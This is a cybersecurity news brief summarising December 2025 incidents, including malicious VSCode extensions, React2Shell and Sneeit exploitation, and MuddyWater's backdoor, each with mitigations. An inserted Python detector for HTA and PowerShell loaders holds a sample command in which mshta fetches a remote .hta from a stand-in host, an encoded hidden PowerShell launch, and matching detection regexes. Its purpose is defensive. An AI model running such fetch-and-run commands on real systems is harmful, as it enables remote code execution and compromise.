Svoboda Cybersecurity Brief December 09, 2025
Leavenworth, Kansas Cyberattack Disrupts City Services
A cyberattack on Leavenworth, Kansas, has disrupted city services, including invoicing, permitting, and hiring systems, since November 19. Emergency services remain unaffected, and no ransomware group has claimed responsibility.
Source: DataBreaches.net
Malicious VSCode Extensions Drop Infostealers
Two malicious VSCode extensions, Bitcoin Black and Codo AI, were found on Microsoft’s marketplace, delivering infostealers that steal credentials and crypto wallets and hijack browser sessions. The malware uses DLL hijacking and hides its activity in %APPDATA%\Local\Evelyn.
Impact: Data theft, session hijacking, and system compromise.
Mitigation: Install extensions only from reputable publishers and monitor for unusual PowerShell/batch script activity.
Source: BleepingComputer
Ransomware Gangs Extorted Over $2.1B from 2022-2024
FinCEN reports that ransomware payments peaked in 2023 ($1.1B) but dropped in 2024 ($734M) after law enforcement disrupted ALPHV/BlackCat and LockBit. The top targeted industries were financial services, healthcare, and manufacturing.
Source: BleepingComputer
Poland Arrests Ukrainians with Advanced Hacking Gear
Three Ukrainians were arrested in Poland for allegedly attempting to damage IT systems using Flipper Zero and K19 RF/GS detection tools. They face charges of fraud and possession of devices for criminal activity.
Source: BleepingComputer
Google Chrome Adds Security Layer for Gemini AI Browsing
Google introduced User Alignment Critic, a secondary LLM, to prevent indirect prompt injection attacks in Chrome’s agentic AI features. It isolates untrusted content and enforces origin-based restrictions.
Impact: Prevents AI-driven data exfiltration and unauthorized actions.
Mitigation: Enable Chrome auto-updates and monitor for Gemini AI behavior anomalies.
Source: BleepingComputer
JS#SMUGGLER Campaign Deploys NetSupport RAT via Compromised Sites
A campaign using obfuscated JavaScript loaders and HTML Applications (HTA) delivers NetSupport RAT, enabling full system control. It targets enterprise users through compromised websites.
Impact: Remote access, data theft, and system compromise.
Mitigation: Enforce CSP, monitor PowerShell/mshta.exe usage, and restrict script execution.
Source: The Hacker News
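One way to act on the "monitor PowerShell/mshta.exe usage" advice above, as an added example that is not part of the brief or of any vendor's tooling: a small Python detector run over constructed process-creation events. The event field names (image, parent_image, command_line) and the sample values are assumptions.

```python
# Added example (not from the brief): flag mshta.exe / PowerShell launches
# typical of HTA-based loaders in exported process-creation events.
# Field names (image, parent_image, command_line) are an assumption.
import json
import re
# Constructed sample telemetry, one JSON object per line (not real events).
SAMPLE_EVENTS = r"""
{"ts":"2025-12-09T10:01:02Z","host":"ws01","image":"C:\\Windows\\System32\\mshta.exe","parent_image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","command_line":"mshta.exe http://example.invalid/update.hta"}
{"ts":"2025-12-09T10:01:03Z","host":"ws01","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\System32\\mshta.exe","command_line":"powershell.exe -w hidden -enc SQBFAFgA"}
{"ts":"2025-12-09T10:02:00Z","host":"ws02","image":"C:\\Windows\\System32\\notepad.exe","parent_image":"C:\\Windows\\explorer.exe","command_line":"notepad.exe notes.txt"}
{"ts":"2025-12-09T10:03:00Z","host":"ws03","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\explorer.exe","command_line":"powershell.exe -File C:\\scripts\\backup.ps1"}
"""

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# mshta fetching a remote .hta or running inline script; PowerShell -enc/-e.
REMOTE_OR_INLINE = re.compile(r"https?://\S+\.hta\b|javascript:|vbscript:", re.I)
ENCODED_PS = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()  # lower-cased file name of a Windows path

def classify(event):
    """Return the list of reasons an event looks like an HTA loader stage."""
    image, parent = basename(event["image"]), basename(event["parent_image"])
    cmd = event.get("command_line", "")
    reasons = []
    if image in SCRIPT_HOSTS and parent in BROWSERS:
        reasons.append("script host spawned by browser")
    if image == "mshta.exe" and REMOTE_OR_INLINE.search(cmd):
        reasons.append("mshta given remote HTA or inline script")
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        reasons.append("mshta chaining into another script host")
    if image in ("powershell.exe", "pwsh.exe") and ENCODED_PS.search(cmd):
        reasons.append("encoded PowerShell command")
    return reasons

def scan(jsonl):
    """Return (host, ts, image, reasons) for every suspicious event."""
    alerts = []
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            alerts.append((event["host"], event["ts"], basename(event["image"]), reasons))
    return alerts

if __name__ == "__main__":
    for host, ts, image, reasons in scan(SAMPLE_EVENTS):
        print(f"{ts} {host} {image}: {'; '.join(reasons)}")
```

Running it on the embedded sample flags the browser-to-mshta launch and the mshta-to-encoded-PowerShell chain while leaving the notepad and scheduled backup script events alone.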
React2Shell (CVE-2025-55182) Exploitation Surges
A critical RCE vulnerability in React Server Components (RSC) is being actively exploited, with over 77,000 vulnerable IPs detected. Attackers deploy cryptominers and Sliver C2 and steal AWS credentials.
Impact: Remote code execution, credential theft, and botnet enrollment.
Mitigation: Patch React to v19.0.1+ and disable RSC if unused.
Source: SecurityWeek
Sneeit WordPress Plugin RCE (CVE-2025-6389) Exploited
A flaw in the Sneeit Framework plugin allows unauthenticated RCE via call_user_func(). Attackers create admin accounts and upload backdoors like tijtewmg.php.
Impact: Full site takeover and malware distribution.
Mitigation: Update to Sneeit v8.4+ and audit admin users.
Source: The Hacker News
MuddyWater Deploys UDPGangster Backdoor in Targeted Campaigns
The Iranian group MuddyWater uses spear-phishing with malicious Word docs to deploy UDPGangster, a UDP-based backdoor targeting Turkey, Israel, and Azerbaijan.
Impact: Remote control, data exfiltration, and payload delivery.
Mitigation: Disable macros, monitor UDP traffic, and enforce email filtering.
Source: The Hacker News
Apache Tika XXE Injection (CVE-2025-66516)
A critical flaw in Apache Tika allows XXE injection via crafted XFA files in PDFs, risking data leaks or RCE. It is patched in versions 3.2.2 (tika-core) and 2.0.0 (tika-parsers).
Impact: Data exfiltration, SSRF, or system compromise.
Mitigation: Update affected modules and sanitize PDF inputs.
Source: SecurityWeek